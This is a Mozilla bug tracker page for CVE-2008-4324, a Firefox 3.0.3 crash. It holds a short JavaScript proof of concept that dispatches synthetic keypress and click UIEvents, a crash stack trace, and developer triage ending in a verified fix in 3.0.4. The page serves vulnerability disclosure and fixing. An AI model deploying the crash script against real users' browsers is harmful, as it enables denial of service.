Closed
Bug 457543
(CVE-2008-4324)
Opened 16 years ago
Closed 16 years ago
FireFox Crashed , Unhandle User Interface Dispatcher Events
Categories
(Core :: DOM: Events, defect)
Tracking
()
VERIFIED
FIXED
People
(Reporter: adi.zerok, Unassigned)
References
()
Details
(Keywords: verified1.9.0.4, Whiteboard: [sg:dupe 454820])
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 Build Identifier: Mozilla 3.0.3 Mozilla 3.0.3 Crashes with unhandled exception in User Interface Dispatcher Events. If a user try to restore session 3.0.3 version it still gives a crash. Reproducible: Always Steps to Reproduce: <script language = "JavaScript"> var moz303 = document.createEvent("UIEvents"); moz303.initUIEvent("keypress", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } moz303.initUIEvent("click", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } </script> The smaller POC Code. Actual Results: The Mozilla Crashes Straight Forward. Expected Results: The software should have handle the exception a with some check introduced to user. The Bug is getting replicated Everytime.
Reporter | ||
Updated•16 years ago
|
Severity: normal → critical
CC list accessible: false
Version: unspecified → 3.0 Branch
I see this on Linux as well, on 3.0 but not on mozilla-central.
OS: Windows XP → All
Hardware: PC → All
Reporter | ||
Comment 2•16 years ago
|
||
But its really hitting 3.0.3 as per detials provided above. Need to be fixed.
Comment 3•16 years ago
|
||
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out. Exception Type: EXC_BAD_ACCESS (SIGBUS) Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007 Crashed Thread: 0 Thread 0 Crashed: 0 libxpcom_core.dylib nsTArray_base::Length() const + 11 (nsTArray.h:66) 1 libgklayout.dylib nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083) 2 libgklayout.dylib nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173) 3 libgklayout.dylib nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080) 4 libgklayout.dylib nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186) 5 libgklayout.dylib nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211) 6 libgklayout.dylib nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293) 7 libgklayout.dylib nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323) 8 libgklayout.dylib nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483) 9 libgklayout.dylib nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541) 10 libgklayout.dylib nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310) ...etc...
Component: Security → DOM: Events
Product: Firefox → Core
QA Contact: firefox → events
Whiteboard: [sg:investigate] null-deref DoS?
Version: 3.0 Branch → 1.9.0 Branch
Updated•16 years ago
|
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 4•16 years ago
|
||
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Keywords: qawanted
Whiteboard: [sg:investigate] null-deref DoS? → [sg:investigate] null-deref DoS? Fix range?
Comment 5•16 years ago
|
||
Didn't Mats just fix this or a variant of this.
Comment 6•16 years ago
|
||
(In reply to comment #5) > Didn't Mats just fix this or a variant of this. Bug 454820
Reporter | ||
Comment 7•16 years ago
|
||
so whats an actual update. I think I have given specific version 3.0.3 and the version details are: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Reporter | ||
Comment 8•16 years ago
|
||
Let me know the specifications about Fix
Comment 9•16 years ago
|
||
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/). It will be ported to 3.0.x builds.
Reporter | ||
Comment 10•16 years ago
|
||
Let me know the specifications about Fix
Reporter | ||
Comment 11•16 years ago
|
||
Last query when exactly will it be ported , to 3.0.x builds.
Updated•16 years ago
|
Status: NEW → RESOLVED
Closed: 16 years ago
Keywords: qawanted
Resolution: --- → DUPLICATE
Whiteboard: [sg:investigate] null-deref DoS? Fix range? → [sg:dupe 454820]
Updated•16 years ago
|
CC list accessible: true
Reporter | ||
Comment 13•16 years ago
|
||
If it was resolved previously why not it is ported to 3.0.3 version.
Reporter | ||
Comment 14•16 years ago
|
||
If it was resolved previously why not it is ported to 3.0.3 version.
Reporter | ||
Updated•16 years ago
|
Resolution: DUPLICATE → WONTFIX
Comment 15•16 years ago
|
||
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
Comment 16•16 years ago
|
||
This has been posted to milw0rm: http://www.milw0rm.com/exploits/6614 I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings. Original URL was: http://www.secniche.org/moz303
Group: core-security
Resolution: WONTFIX → DUPLICATE
Updated•16 years ago
|
Flags: wanted1.8.1.x-
Flags: blocking1.9.0.4+
Comment 18•16 years ago
|
||
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Depends on: 454820
Resolution: DUPLICATE → FIXED
Updated•16 years ago
|
Alias: CVE-2008-4324
Comment 20•16 years ago
|
||
(In reply to comment #18) > This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4 Adding the fixed1.9.0.4 keyword then. :)
Keywords: fixed1.9.0.4
Comment 21•16 years ago
|
||
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.
Status: RESOLVED → VERIFIED
Keywords: fixed1.9.0.4 → verified1.9.0.4
You need to log in
before you can comment on or make changes to this bug.
Description
•